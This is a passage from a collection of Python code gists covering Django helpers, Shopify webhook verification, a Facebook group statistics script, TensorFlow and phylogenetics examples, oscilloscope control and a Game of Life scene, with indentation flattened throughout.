cmd = "for i in $(pactl list short modules | grep module-loopback | grep source=bluez_source.%s | cut -f 1); do pactl unload-module $i; done" % bt_addr
os.system(cmd)
def object_signal(value, path, interface, member):
iface = interface[interface.rfind(".") + 1:]
val = str(value)
print "{%s.%s} [%s] Path = %s" % (iface, member, path, val)
if __name__ == '__main__':
dbus.mainloop.glib.DBusGMainLoop(set_as_default=True)
bus = dbus.SystemBus()
bus.add_signal_receiver(property_changed, bus_name="org.bluez", signal_name = "PropertyChanged", path_keyword="path", interface_keyword="interface")
mainloop = gobject.MainLoop()
mainloop.run()
```
#### File: hard-gists/8477219/snippet.py
```python
from django.db import connection, models
class MyManager(Manager):
def raw_as_qs(self, raw_query, params=()):
"""Execute a raw query and return a QuerySet. The first column in the
result set must be the id field for the model.
:type raw_query: str | unicode
:type params: tuple[T] | dict[str | unicode, T]
:rtype: django.db.models.query.QuerySet
"""
cursor = connection.cursor()
try:
cursor.execute(raw_query, params)
return self.filter(id__in=(x[0] for x in cursor))
finally:
cursor.close()
class MyModel(models.Model):
objects = MyManager()
```
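A brief usage sketch for the manager above; the raw SQL, table name, and model fields are illustrative assumptions, not part of the original snippet:
```python
# Hypothetical usage (assumes MyModel lives in an app named "myapp" and has
# created_at/active fields):
qs = MyModel.objects.raw_as_qs(
    "SELECT id FROM myapp_mymodel WHERE created_at >= %s", params=('2014-01-01',))
# Unlike Manager.raw(), the result is a real QuerySet, so it can still be
# chained, counted, or paginated:
recent = qs.filter(active=True).count()
```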
#### File: hard-gists/8513270/snippet.py
```python
import hashlib, base64, hmac, json, settings
from functools import wraps
from django.http import HttpResponseBadRequest, HttpResponseForbidden
def shopify_webhook(f):
"""
A decorator thats checks and validates a Shopify Webhook request.
"""
def _hmac_is_valid(body, secret, hmac_to_verify):
hash = hmac.new(secret, body, hashlib.sha256)  # hmac.new(key, msg, digestmod)
hmac_calculated = base64.b64encode(hash.digest())
return hmac_calculated == hmac_to_verify
@wraps(f)
def wrapper(request, *args, **kwargs):
# Try to get required headers and decode the body of the request.
try:
webhook_topic = request.META['HTTP_X_SHOPIFY_TOPIC']
webhook_hmac = request.META['HTTP_X_SHOPIFY_HMAC_SHA256']
webhook_data = json.loads(request.body)
except:
return HttpResponseBadRequest()
# Verify the HMAC.
if not _hmac_is_valid(request.body, settings.SHOPIFY_API_SECRET, webhook_hmac):
return HttpResponseForbidden()
# Otherwise, set properties on the request object and return.
request.webhook_topic = webhook_topic
request.webhook_data = webhook_data
return f(request, *args, **kwargs)
return wrapper
```
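A minimal sketch of how the decorator above might be attached to a Django view; the view name and response body are assumptions for illustration:
```python
from django.http import HttpResponse
from django.views.decorators.csrf import csrf_exempt

@csrf_exempt          # Shopify posts from outside the site, so CSRF must be skipped
@shopify_webhook
def order_created(request):
    # The decorator has already verified the HMAC and parsed the JSON body.
    order_id = request.webhook_data.get('id')
    return HttpResponse('received %s for topic %s' % (order_id, request.webhook_topic))
```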
#### File: hard-gists/8555297/snippet.py
```python
import sublime
import sublime_plugin
class OpenFromClipboardCommand(sublime_plugin.WindowCommand):
def run(self):
fn = sublime.get_clipboard()
if fn:
sublime.active_window().open_file(fn)
else:
sublime.status_message("Nothing to open. The clipboard is empty.")
```
#### File: hard-gists/8577232/snippet.py
```python
from Queue import Queue # Threadsafe queue for threads to use
from collections import Counter # To count stuff for us
import datetime # Because datetime printing is hard
from pprint import pprint
import time # Should be obvious
import subprocess # Used to send notifications on mac
import sys # Get system info
import threading # Should be obvious
import json # Also obvious
# FB API wrapper ("pip install facebook-sdk")
import facebook
__author__ = '<NAME>'
appeared = dict()
# For printing pretty colors in terminal
class color:
PURPLE = '\033[95m'
CYAN = '\033[96m'
DARKCYAN = '\033[36m'
BLUE = '\033[94m'
GREEN = '\033[92m'
YELLOW = '\033[93m'
RED = '\033[91m'
BOLD = '\033[1m'
UNDERLINE = '\033[4m'
END = '\033[0m'
# If you're on mac, install terminal-notifier ("brew install terminal-notifier")
# to get nifty notifications when it's done
def notify_mac():
if sys.platform == "darwin":
try:
subprocess.call(
["terminal-notifier", "-message", "Done", "-title", "FB_Bot",
"-sound", "default"])
except OSError:
print "If you have terminal-notifier, this would be a notification"
# Log message with colors
# ... I never learned the proper way to log in python
def log(message, *colorargs):
if len(colorargs) > 0:
print colorargs[0] + message + color.END
else:
print message
# Junk method used for testing
def test():
log("Test")
# Export method, receives a jsonObj of style {"label": dictionary}
def exportData(jsonDict):
# Do stuff
print "Exported"
# print jsonDict
# Thread class. Each thread gets all the data from a certain date range
class RequestThread(threading.Thread):
def __init__(self, queue, apikey, query, curr_time, num_weeks):
# Super class
threading.Thread.__init__(self)
# Queue object given from outside. Queues are threadsafe
self.queue = queue
# Graph object for our call, authenticated with a token
self.graph = facebook.GraphAPI(apikey)
# FQL query with specified date range
self.input_query = query
# Counters. t-total, p-posts, c-comments
self.tcounter = Counter()
self.pcounter = Counter()
self.ccounter = Counter()
self.tpcounter = Counter()
self.tccounter = Counter()
self.cccounter = Counter()
# Time range, for logging
self.time_range = datetime.datetime.fromtimestamp(
curr_time - num_weeks).strftime('%Y-%m-%d') + "-" + \
datetime.datetime.fromtimestamp(curr_time).strftime(
'%Y-%m-%d')
# Main runner
def run(self):
log("\t(" + self.time_range + ') - Getting posts...')
# Get group posts
try:
group_posts = self.graph.fql(query=self.input_query)
except facebook.GraphAPIError as e:
# 99% of the time this is just an expired API access token
log("Error: " + str(e), color.RED)
sys.exit()
log("\t(" + self.time_range + ") - " +
str(len(group_posts)) + " posts")
# Iterate over posts
if len(group_posts) != 0:
for post in group_posts:
comments_query = \
"SELECT fromid, likes, id, time FROM comment WHERE post_id="
# If it's a new actor
if post['actor_id'] in appeared.keys():
if appeared[post['actor_id']] > int(post['created_time']):
appeared[post['actor_id']] = int(post['created_time'])
else:
appeared[post['actor_id']] = int(post['created_time'])
# Add post's like count to that user in our total_likes_counter
self.tcounter[post['actor_id']] += post[
'like_info']['like_count']
# Add to top like posts counter
self.pcounter[post['post_id']] = post['like_info'][
'like_count']
# Timestamp of post by
day_timestamp = datetime.datetime.fromtimestamp(int(post['created_time']))
day_timestamp = day_timestamp.replace(hour=0, minute=0, second=0, microsecond=0)
day_timestamp = (day_timestamp - datetime.datetime(1970, 1, 1)).total_seconds()
# Add to post count
self.tpcounter[str(day_timestamp)] += 1
# Initialize controversial counter
self.cccounter[post['post_id']] += 1
# Get likes on comments
comments = self.graph.fql(
comments_query + "\"" + str(post['post_id']) +
"\" LIMIT 350")
# Iterate over comments
if len(comments) != 0:
log("\t(" + self.time_range + ") - " + str(
len(comments)) + " comments")
log("\t(" + self.time_range + ') - Getting comments...')
for c in comments:
# add their like counts to their respective users
# in our total_likes_counter
self.tcounter[c['fromid']] += c['likes']
# add like count to top_comments_likes_counter
self.ccounter[c['id']] = c['likes']
# Add to comment count
self.tccounter[str(day_timestamp)] += 1
# Add to controversial counter
self.cccounter[post['post_id']] += 1
# If it's a new actor
if c['fromid'] in appeared.keys():
if appeared[c['fromid']] > int(c['time']):
appeared[c['fromid']] = int(c['time'])
else:
appeared[c['fromid']] = int(c['time'])
else:
log("\tNo comments from this post")
else:
log("\tNo posts from this time frame")
self.queue.put({'t': self.tcounter, 'p': self.pcounter, 'c':
self.ccounter, 'tp': self.tpcounter,
'tc': self.tccounter, 'cc': self.cccounter})
# Method for counting various total likes in a group
def count_group_likes():
# Access token can be obtained by doing the following:
# - Log into facebook
# - Go to this url: https://developers.facebook.com/tools/explorer
fb_API_access_token = "token_goes_here"
# Only necessary if you want to get an extended access token
# You'll have to make a facebook app and generate a token with it
# You'll also need to get the following two values from it
fb_app_id = "id_goes_here"
fb_secret_key = "key_goes_here"
# Counter object to do the counting for us
total_likes_counter = Counter()
top_liked_posts_counter = Counter()
top_liked_comments_counter = Counter()
total_posts_counter = Counter()
total_comments_counter = Counter()
most_discussed_counter = Counter()
group_id = "id_goes_here" # Unique ID of the group to search.
num_of_items_to_return = 30 # Return the top ____ most liked ____
# Put the number of weeks you want it to increment by each time
# smaller is better, but too small and you could hit your rate limit
# ... which is 600 calls per 600 seconds. Maybe apps get more
num_weeks = int("2")
# Convert to unix time
num_weeks_unix = num_weeks * 604800
# Start date, in unix time (our group was made 2/13/12)
# You can use this to convert: http://goo.gl/4QMFbW
start_date = int("start_date_goes_here")
datetime_start_date = datetime.datetime.fromtimestamp(start_date)
# Query strings for FQL
posts_query = \
"SELECT post_id, like_info, actor_id, created_time FROM stream" + \
" WHERE source_id=" + group_id + " AND created_time<"
person_query = "SELECT first_name, last_name FROM user WHERE uid="
# Authorize our API wrapper
graph = facebook.GraphAPI(fb_API_access_token)
# Code to programatically extend key
if extend_key:
result = graph.extend_access_token(fb_app_id, fb_secret_key)
new_token = result['access_token']
new_time = int(result['expires']) + time.time()
# This will print out new extended token and new expiration date
# Copy them and replace your token above with this one
print 'New token: ' + new_token
print 'New expiration date: ' + datetime.datetime.fromtimestamp(
new_time).strftime('%Y-%m-%d %H:%M:%S')
log('Getting group posts', color.BLUE)
# Send end time to current time and work backward
end_time = int(time.time())
# Or manually set end time
# end_time = <end_time>
log('Current date is: ' + datetime.datetime.fromtimestamp(
end_time).strftime('%Y-%m-%d'))
log('Incrementing by ' + str(num_weeks) + ' weeks at a time')
# List of thread objects
threads = []
# Threadsafe queue for the threads to dump their data in
final_queue = Queue()
log("Initializing threads...", color.BLUE)
# While loop that creates the threads
# Instantiates each thread with calculated time, keeps decrementing to
# start
while end_time > start_date:
# New query
new_query = posts_query + str(
end_time) + " AND created_time>" + \
str(end_time - num_weeks_unix) + " LIMIT 600"
# Thread creation
t = RequestThread(final_queue, fb_API_access_token, new_query,
end_time, num_weeks_unix)
# Add it to our list
threads.append(t)
# Decrement the time
end_time -= num_weeks_unix
# Start the thread
t.start()
log("Joining threads...", color.BLUE)
# Wait for all the threads to finish before counting everything up
for t in threads:
t.join()
log("Done, merging data...", color.BLUE)
# Count up all the data by merging all the counters from each thread result
for stuff in list(final_queue.queue):
total_likes_counter += stuff['t']
top_liked_posts_counter += stuff['p']
top_liked_comments_counter += stuff['c']
total_posts_counter += stuff['tp']
total_comments_counter += stuff['tc']
most_discussed_counter += stuff['cc']
most_active_day_counter = total_posts_counter + total_comments_counter
# Returns key-value list of most liked people
most_common_people = total_likes_counter.most_common(
num_of_items_to_return)
top_posts = top_liked_posts_counter.most_common(num_of_items_to_return)
top_comments = top_liked_comments_counter.most_common(
num_of_items_to_return)
total_posts = total_posts_counter.most_common(num_of_items_to_return)
total_comments = total_comments_counter.most_common(num_of_items_to_return)
most_active_days = most_active_day_counter.most_common(num_of_items_to_return)
most_discussed = most_discussed_counter.most_common(num_of_items_to_return)
top_people_stats = []
# Iterate over top people and retrieve names from their ID's
# Use enumerate to keep track of indices for rank numbers
log('\nPeople Stats', color.BOLD)
log("* = Weighted average calc'd from user's first post date")
for i, x in enumerate(most_common_people):
person = graph.fql(person_query + str(x[0]))[0]
now = datetime.datetime.now()
join_date = datetime.datetime.fromtimestamp(appeared[x[0]])
diff1 = now - datetime_start_date
diff2 = now - join_date
avg = x[1] / (diff1.total_seconds()/60/60/24/7)
weighted_avg = x[1] / (diff2.total_seconds()/60/60/24/7)
top_people_stats.append({
"name": person['first_name'] + " " + person['last_name'],
"likes": x[1],
"avg": avg,
"augmented_avg": weighted_avg,
"first": int((join_date - datetime.datetime(1970, 1, 1)).total_seconds())
})
print '#' + str(i+1) + '. ' + person['first_name'] + " " + person['last_name']
print '-- Likes: ' + str(x[1])
print '-- Weekly average: ' + str(avg)
print '-- Weekly average*: ' + str(weighted_avg)
print '-- First post: ' + join_date.strftime('%Y-%m-%d')
# Iterate over top posts and get info
log('\nTop posts!', color.BOLD)
for x in top_posts:
post = graph.get_object(str(x[0]))
s = str(x[1]) + " - " + post['from']['name'] + " - " + post['type']
print s
if 'message' in post:
m = str(post['message'].encode('ascii', 'ignore')).replace('\n', ' ')
if len(m) > 70:
print '-- ' + m[0:70] + "..."
else:
print '-- ' + m
print '-- http://www.facebook.com/' + post['id']
# Iterate over top comments and get info
log('\nTop comments!', color.BOLD)
for x in top_comments:
comment = graph.get_object(str(x[0]))
s = str(x[1]) + " - " + comment['from']['name']
print s
if 'message' in comment:
c = str(comment['message'].encode('ascii', 'ignore')).replace('\n', ' ')
if len(c) > 70:
print '-- ' + c[0:70] + "..."
else:
print '-- ' + c
print '-- http://www.facebook.com/' + comment['id']
# Iterate over total posts/comments and calculate info
log('\nMost active days (by number of posts and comments)', color.BOLD)
for x in most_active_days:
d = datetime.datetime.fromtimestamp(float(x[0])).strftime('%m/%d/%Y')
print str(x[1]) + " - " + d
# Iterate over total posts and calculate info
log('\nMost active days (by number of posts)', color.BOLD)
for x in total_posts:
d = datetime.datetime.fromtimestamp(float(x[0])).strftime('%m/%d/%Y')
print str(x[1]) + " - " + d
# Iterate over total comments and calculate info
log('\nMost active days (by number of comments)', color.BOLD)
for x in total_comments:
d = datetime.datetime.fromtimestamp(float(x[0])).strftime('%m/%d/%Y')
print str(x[1]) + " - " + d
# Iterate over top posts and get info
log('\nMost discussed', color.BOLD)
for x in most_discussed:
post = graph.get_object(str(x[0]))
s = str(x[1]) + " - " + post['from']['name'] + " - " + post['type']
print s
if 'message' in post:
m = str(post['message'].encode('ascii', 'ignore')).replace('\n', ' ')
if len(m) > 70:
print '-- ' + m[0:70] + "..."
else:
print '-- ' + m
print '-- http://www.facebook.com/' + post['id']
log('\nExporting...', color.BLUE)
dataDict = json.dumps({"top_people_stats": top_people_stats,
"top_liked_posts_counter": top_liked_posts_counter,
"top_liked_comments_counter": top_liked_comments_counter,
"total_posts_counter": total_posts_counter,
"total_comments_counter": total_comments_counter,
"most_active_day_counter": most_active_day_counter,
"most_common_people": most_common_people,
"top_posts": top_posts,
"top_comments": top_comments,
"total_posts": total_posts,
"total_comments": total_comments,
"most_active_days": most_active_days})
exportData(dataDict)
args = sys.argv
extend_key = False # boolean for if we want to extend token access
if len(args) > 1:
if "--extend" in args: # Pass in flag
extend_key = True
if "test" in args:
test()
sys.exit()
else:
log('No args specified')
count_group_likes()
notify_mac()
```
#### File: hard-gists/8617378/snippet.py
```python
from django.db import models
class Thing(models.Model):
# [ snip ]
def is_deletable(self):
for rel in self._meta.get_all_related_objects():
if rel.model.objects.filter(**{rel.field.name: self}).exists():
return False
return True
```
#### File: hard-gists/8659759/snippet.py
```python
import re
from django.utils.encoding import force_text
from django.core.exceptions import ValidationError
class DomainNameValidator(object):
"""
Domain name validator adapted from Django's EmailValidator.
"""
message = 'Enter a valid domain name.'
code = 'invalid'
domain_regex = re.compile(
r'(?:[A-Z0-9](?:[A-Z0-9-]{0,61}[A-Z0-9])?\.)+(?:[A-Z]{2,6}|[A-Z0-9-]{2,})$' # domain
# literal form, ipv4 address (SMTP 4.1.3)
r'|^\[(25[0-5]|2[0-4]\d|[0-1]?\d?\d)(\.(25[0-5]|2[0-4]\d|[0-1]?\d?\d)){3}\]$',
re.IGNORECASE)
domain_whitelist = ['localhost']
def __init__(self, message=None, code=None, whitelist=None):
if message is not None:
self.message = message
if code is not None:
self.code = code
if whitelist is not None:
self.domain_whitelist = whitelist
def __call__(self, value):
value = force_text(value)
if not value:
raise ValidationError(self.message, code=self.code)
if (not value in self.domain_whitelist and
not self.domain_regex.match(value)):
# Try for possible IDN domain-part
try:
value = value.encode('idna').decode('ascii')
if not self.domain_regex.match(value):
raise ValidationError(self.message, code=self.code)
else:
return
except UnicodeError:
pass
raise ValidationError(self.message, code=self.code)
validate_domain_name = DomainNameValidator()
def is_valid_domain_name(value):
try:
validate_domain_name(value)
return True
except ValidationError:
pass
return False
```
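A short usage sketch for the validator above; the model field definition is an assumption about how it might typically be wired in:
```python
# Direct checks:
is_valid_domain_name('example.com')        # True
is_valid_domain_name('not a domain')       # False

# Hypothetical model field using the callable validator:
# domain = models.CharField(max_length=253, validators=[validate_domain_name])
```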
#### File: hard-gists/8663d3bbfd586bffecf6a0094cd116f2/snippet.py
```python
import functools
import tensorflow as tf
from tensorflow.examples.tutorials.mnist import input_data
def doublewrap(function):
"""
A decorator for decorators, allowing the decorated decorator to be used
without parentheses if no arguments are provided. All arguments must be optional.
"""
@functools.wraps(function)
def decorator(*args, **kwargs):
if len(args) == 1 and len(kwargs) == 0 and callable(args[0]):
return function(args[0])
else:
return lambda wrapee: function(wrapee, *args, **kwargs)
return decorator
@doublewrap
def define_scope(function, scope=None, *args, **kwargs):
"""
A decorator for functions that define TensorFlow operations. The wrapped
function will only be executed once. Subsequent calls to it will directly
return the result so that operations are added to the graph only once.
The operations added by the function live within a tf.variable_scope(). If
this decorator is used with arguments, they will be forwarded to the
variable scope. The scope name defaults to the name of the wrapped
function.
"""
attribute = '_cache_' + function.__name__
name = scope or function.__name__
@property
@functools.wraps(function)
def decorator(self):
if not hasattr(self, attribute):
with tf.variable_scope(name, *args, **kwargs):
setattr(self, attribute, function(self))
return getattr(self, attribute)
return decorator
class Model:
def __init__(self, image, label):
self.image = image
self.label = label
self.prediction
self.optimize
self.error
@define_scope(initializer=tf.contrib.slim.xavier_initializer())
def prediction(self):
x = self.image
x = tf.contrib.slim.fully_connected(x, 200)
x = tf.contrib.slim.fully_connected(x, 200)
x = tf.contrib.slim.fully_connected(x, 10, tf.nn.softmax)
return x
@define_scope
def optimize(self):
logprob = tf.log(self.prediction + 1e-12)
cross_entropy = -tf.reduce_sum(self.label * logprob)
optimizer = tf.train.RMSPropOptimizer(0.03)
return optimizer.minimize(cross_entropy)
@define_scope
def error(self):
mistakes = tf.not_equal(
tf.argmax(self.label, 1), tf.argmax(self.prediction, 1))
return tf.reduce_mean(tf.cast(mistakes, tf.float32))
def main():
mnist = input_data.read_data_sets('./mnist/', one_hot=True)
image = tf.placeholder(tf.float32, [None, 784])
label = tf.placeholder(tf.float32, [None, 10])
model = Model(image, label)
sess = tf.Session()
sess.run(tf.initialize_all_variables())
for _ in range(10):
images, labels = mnist.test.images, mnist.test.labels
error = sess.run(model.error, {image: images, label: labels})
print('Test error {:6.2f}%'.format(100 * error))
for _ in range(60):
images, labels = mnist.train.next_batch(100)
sess.run(model.optimize, {image: images, label: labels})
if __name__ == '__main__':
main()
```
#### File: hard-gists/868b1057d9c0b72a57b809a67ad6e4cc/snippet.py
```python
from collections import defaultdict
from ete3 import PhyloTree, TreeStyle, SeqMotifFace, TextFace, RectFace
alg = """
>Dme_001
MAEIPDETIQQFMALT---HNIAVQYLSEFGDLNEAL--YYASQTDDIKDRREEAH
>Dme_002
MAEIPDATIQQFMALTNVSHNIAVQY--EFGDLNEALNSYYAYQTDDQKDRREEAH
>Cfa_001
MAEIPDATIQ---ALTNVSHNIAVQYLSEFGDLNEALNSYYASQTDDQPDRREEAH
>Mms_001
MAEAPDETIQQFMALTNVSHNIAVQYLSEFGDLNEAL--------------REEAH
>Hsa_001
MAEIPDETIQQFMALT---HNIAVQYLSEFGDLNEALNSYYASQTDDIKDRREEAH
>Ptr_002
MAEIPDATIQ-FMALTNVSHNIAVQY--EFGDLNEALNSY--YQTDDQKDRREEAH
>Mmu_002
MAEIPDATIQ---ALTNVSHNIAVQYLSEFGDLNEALNSYYASQTDDQPDRREEAH
>Hsa_002
MAEAPDETIQQFM-LTNVSHNIAVQYLSEFGDLNEAL--------------REEAH
>Ptr_001
MAEIPDATIQ-FMALTNVSHNIAVQY--EFGDLNEALNSY--YQTDDQKDRREEAH
>Mmu_001
MAEIPDTTIQ---ALTNVSHNIAVQYLSEFGDLNEALNSYYASQTDDQPDRREEAH
"""
def mutation_columns(sequences):
col2diffs = defaultdict(set)
alg_length = len(sequences[0])
for col in xrange(alg_length):
for seq in sequences:
col2diffs[col].add(seq[col])
col2diffs[col].discard('-')
subseqs = set()
relevant_columns = []
for col in xrange(alg_length):
if len(col2diffs[col]) > 1:
relevant_columns.append(col)
for seq in sequences:
subseqs.add(''.join([seq[col] for col in relevant_columns]))
return subseqs, relevant_columns
def get_example_tree():
# Performs a tree reconciliation analysis
gene_tree_nw = '((Dme_001,Dme_002),(((Cfa_001,Mms_001),((Hsa_001,Ptr_001),Mmu_001)),(Ptr_002,(Hsa_002,Mmu_002))));'
t = PhyloTree(gene_tree_nw)
ts = TreeStyle()
# disable default PhyloTree Layout
ts.layout_fn = lambda x: True
t.link_to_alignment(alg)
node2content = t.get_cached_content()
for node in t.traverse():
node.img_style["size"] = 0
if not node.is_leaf():
leaves = node2content[node]
# get columns with different aa
subseqs, relevant_columns = mutation_columns([lf.sequence for lf in leaves])
for seq in subseqs:
f = SeqMotifFace(seq, seq_format="seq", width=10, height=8)
f.margin_top = 2
f.margin_right = 6
node.add_face(f, column=0, position="branch-bottom")
for j, col in enumerate(relevant_columns):
col_f = RectFace(10, 10, fgcolor=None, bgcolor=None,
label={"text":str(col), "fonttype":"Courier", "color":"black", "fontsize":6})
node.add_face(col_f, column=j, position="branch-top")
col_f.margin_bottom = 2
else:
f = SeqMotifFace(node.sequence, seq_format="seq", width=6)
node.add_face(f, column=0, position="aligned")
alg_length = len(lf.sequence)
ts.draw_aligned_faces_as_table = False
for colnum in xrange(alg_length):
col_f = RectFace(10, 10, fgcolor=None, bgcolor=None,
label={"text":str(colnum), "fonttype":"Courier", "color":"black", "fontsize":6})
ts.aligned_header.add_face(col_f, column=colnum)
return t, ts
if __name__ == "__main__":
t, ts = get_example_tree()
t.show(tree_style=ts)
```
#### File: hard-gists/872145/snippet.py
```python
from django.conf import settings
from django.db.models import Model, Manager
from django.db.models.query import QuerySet
MUTATING_QUERYSETS = getattr(settings, 'MUTATING_QUERYSETS', False)
class QuerySetMixin(object):
def __init__(self, *args, **kwargs):
self._no_monkey.__init__(self, *args, **kwargs)
self._inplace = MUTATING_QUERYSETS
def inplace(self):
self._inplace = True
return self
def _clone(self, klass=None, setup=False, **kwargs):
if self._inplace and klass is None:
self.__dict__.update(kwargs)
return self
else:
return self._no_monkey._clone(self, klass, setup, **kwargs)
class ManagerMixin(object):
def inplace(self):
return self.get_query_set().inplace()
from inspect import getmembers, ismethod
class MonkeyProxy(object):
def __init__(self, cls):
monkey_bases = tuple(b._no_monkey for b in cls.__bases__ if hasattr(b, '_no_monkey'))
for monkey_base in monkey_bases:
for name, value in monkey_base.__dict__.iteritems():
setattr(self, name, value)
def monkey_mix(cls, mixin, methods=None):
"""
Mixes a class into another existing class using monkey patches.
Mixin methods can call the overwritten ones using the special proxy object stored in the _no_monkey attribute.
class SomeMixin(object):
def do_smth(self, arg):
... do smth else before
self._no_monkey.do_smth(self, arg)
... do smth else after
"""
assert '_no_monkey' not in cls.__dict__, 'Multiple monkey mix not supported'
cls._no_monkey = MonkeyProxy(cls)
if methods is None:
methods = getmembers(mixin, ismethod)
else:
methods = [(m, getattr(mixin, m)) for m in methods]
for name, method in methods:
if hasattr(cls, name):
setattr(cls._no_monkey, name, getattr(cls, name))
setattr(cls, name, method.im_func)
monkey_mix(Manager, ManagerMixin)
monkey_mix(QuerySet, QuerySetMixin)
```
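A sketch of what the patched API enables, assuming a hypothetical `Article` model and `MUTATING_QUERYSETS` left at its default of False:
```python
# Normally each .filter() clones the QuerySet; after .inplace() the same
# object is mutated in place, so long filter chains avoid repeated copies.
qs = Article.objects.inplace()
qs.filter(published=True)
qs.filter(author_id=1)
# qs now carries both filters without any intermediate clones.
```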
#### File: hard-gists/880901/snippet.py
```python
from django.db.models.signals import post_syncdb
from django.contrib.contenttypes.models import ContentType
from django.contrib.auth.models import Permission
def add_view_permissions(sender, **kwargs):
"""
This syncdb hook takes care of adding a view permission to all our
content types.
"""
# for each of our content types
for content_type in ContentType.objects.all():
# build our permission slug
codename = "view_%s" % content_type.model
# if it doesn't exist..
if not Permission.objects.filter(content_type=content_type, codename=codename):
# add it
Permission.objects.create(content_type=content_type,
codename=codename,
name="Can view %s" % content_type.name)
print "Added view permission for %s" % content_type.name
# check for all our view permissions after a syncdb
post_syncdb.connect(add_view_permissions)
```
#### File: hard-gists/8814190/snippet.py
```python
import visa
import os, serial
import numpy as np
import pylab as plt
import time
from datetime import date
class Scope:
def __init__(self,address,timeOut=40,chunkSize=1024000):
self.device = visa.instrument(address,timeout=timeOut,chunk_size=chunkSize)
self.id = self.device.ask("*idn?")
self.device.write(":key:lock disable") # Allows the panel keys on the scope to be used
self.device.write(":acquire:type normal")
self.device.write(":acquire:memdepth long")
self.device.write(":acquire:mode EQUAL_TIME")
#self.device.write(":acquire:averages 16\n")
def fastGet(self,channelNumber=1,verbose=False):
voltscale = self.device.ask_for_values(":CHAN"+`channelNumber`+":SCAL?")[0]
voltoffset = self.device.ask_for_values(":CHAN"+`channelNumber`+":OFFS?")[0]
if verbose:
print "Voltage scale = ", voltscale, "Voltage offset = ", voltoffset
samplingrate = self.device.ask_for_values(':ACQ:SAMP? CHANNEL'+`channelNumber`)[0]
timePerDiv = self.device.ask_for_values(':TIM:SCAL? CHANNEL'+`channelNumber`)[0]
rawdata = self.device.ask(":WAV:DATA? CHAN"+`channelNumber`)[10:]
data_size = len(rawdata)
if verbose: print 'Data size = ', data_size, "Sample rate = ", samplingrate
data = np.frombuffer(rawdata, 'B')
V = (240-data) * voltscale/25. - (voltoffset + voltscale*4.6)
dt = timePerDiv/50.
t = np.arange(0,len(V)*dt,dt)
np.arange(len(data)) * 1./samplingrate
if verbose: print data
return t, V
def getWaveform(self,channelNumber=1,verbose=True):
"""Acquire 1 M samples from channel"""
# Flush buffer
self.device.write(":ACQ:MEMD LONG")
self.device.write(":STOP")
self.device.write(":RUN")
time.sleep(5)
self.device.write(":STOP")
time.sleep(2)
self.device.write(":STOP")
self.device.write(":WAVEFORM:POINTS:MODE RAW")
voltscale = self.device.ask_for_values(":CHAN"+`channelNumber`+":SCAL?")[0]
voltoffset = self.device.ask_for_values(":CHAN"+`channelNumber`+":OFFS?")[0]
if verbose:
print "Voltage scale = ", voltscale, "Voltage offset = ", voltoffset
samplingrate = self.device.ask_for_values(':ACQ:SAMP? CHANNEL'+`channelNumber`)[0]
rawdata = self.device.ask(":WAV:DATA? CHAN"+`channelNumber`)[10:]
data_size = len(rawdata)
if verbose:
print 'Data size = ', data_size, "Sample rate = ", samplingrate
data = np.frombuffer(rawdata, 'B')
V = (240-data) * voltscale/25 - (voltoffset + voltscale*4.6)
t = np.arange(len(data)) * 1./samplingrate
if verbose: print data
return t, V
def recordAverages(self):
"""Log the average voltages"""
V1,V2 = np.array([]), np.array([])
V = np.array([])
t = np.array([])
t0 = time.time()
ti = time.time()
tAcq = 2*3600 # seconds
while ti < (t0 + tAcq):
try:
self.device.write(":MEASURE:VAVERAGE? CH1")
dataString = self.device.read()
ti = time.time()
Vi = float(dataString[:-1])
time.sleep(1)
except KeyboardInterrupt:
print "Acquisition stopped."
break
print ti,Vi
V = np.concatenate( (V,[Vi]) )
t = np.concatenate( (t,[ti]) )
if len(t)%100 == 0: I = V/1e6
DataOut = np.column_stack( (t,I) )
fileName = date.today().strftime("%y%m%d")+"-beamCurrent"+".log"
np.savetxt(fileName,DataOut)
def close(self):
self.device.write("KEY:FORCE")
self.device.close()
```
#### File: hard-gists/8832970/snippet.py
```python
from scene import *
from PIL import Image, ImageDraw
import random
class Cell (object):
def __init__(self, x, y, frame):
self.frame = frame
self.pos = (x, y)
self.alive = 0
self.neighbors = []
self.background = Color(0,0,0)
def update(self, b=None):
if b is not None:
self.alive = b
self.background = Color(1,1,1) if self.alive else Color(0,0,0)
def living_neighbors(self):
return [c for c in self.neighbors if c.alive]
def draw(self):
fill(*self.background)
rect(*self.frame)
class Grid (object):
def __init__(self, w, h):
self.size = Size(w, h)
w, h = (screen.w/w, screen.h/h)
self.cells = {(x, y):Cell(x, y, Rect(x*w, y*h, w, h)) for x in xrange(self.size.w) for y in xrange(self.size.h)}
for c in self.cells.values():
self.adjacent_cells(c)
grid_img = Image.new('RGBA', [int(i) for i in screen.as_tuple()])
grid_draw = ImageDraw.Draw(grid_img)
for x in xrange(self.size.w): grid_draw.line((x*w, 0, x*w, screen.h))
for y in xrange(self.size.h): grid_draw.line((0, y*h, screen.w, y*h))
self.grid_img = load_pil_image(grid_img)
del grid_img, grid_draw
def __iter__(self):
return iter(sorted(self.cells.keys()))
def __getitem__(self, key):
return self.cells[key]
def itervalues(self):
return iter(self.cells.values())
def create_life(self, pos_list=None):
if pos_list is None:
w, h = self.size
for i in xrange(int((w*h)**0.5)*2):
self.cells[(random.randint(0,w-1), random.randint(0,h-1))].update(1)
else:
for p in pos_list:
self.cells[p].update(1)
def living_cells(self):
return [c for c in self.cells.values() if c.alive]
def dead_cells(self):
return [c for c in self.cells.values() if not c.alive]
def adjacent_cells(self, cell):
w, h = self.size
cx, cy = cell.pos
for y in (-1,0,1):
for x in (-1,0,1):
nx = cx+x
ny = cy+y
if x == y == 0:
continue
if nx>=0 and nx<w and ny>=0 and ny<h:
cell.neighbors.append(self[(nx, ny)])
def update(self):
kill = []
life = []
for cell in self.dead_cells():
if len(cell.living_neighbors()) == 3:
life.append(cell)
for cell in self.living_cells():
if len(cell.living_neighbors()) < 2:
kill.append(cell)
elif len(cell.living_neighbors()) > 3:
kill.append(cell)
else:
life.append(cell)
for k in kill:
self.cells[k.pos].update(0)
for l in life:
self.cells[l.pos].update(1)
def draw(self):
stroke(1,1,1)
stroke_weight(1)
image(self.grid_img, 0, 0)
class MyScene (Scene):
def setup(self):
global screen
screen = self.size
self.paused = True
self.grid = Grid(50, 35)
for c in self.grid.itervalues():
c.update()
def draw(self):
background(0,0,0)
for c in self.grid.living_cells():
c.draw()
self.grid.draw()
if not self.paused:
if len(self.grid.living_cells()) == 0:
self.paused = True
if len(self.grid.living_cells()) > 0:
self.grid.update()
for touch in self.touches.values():
if len(self.touches) == 1:
for cell in self.grid.itervalues():
if touch.location in cell.frame:
cell.update(1)
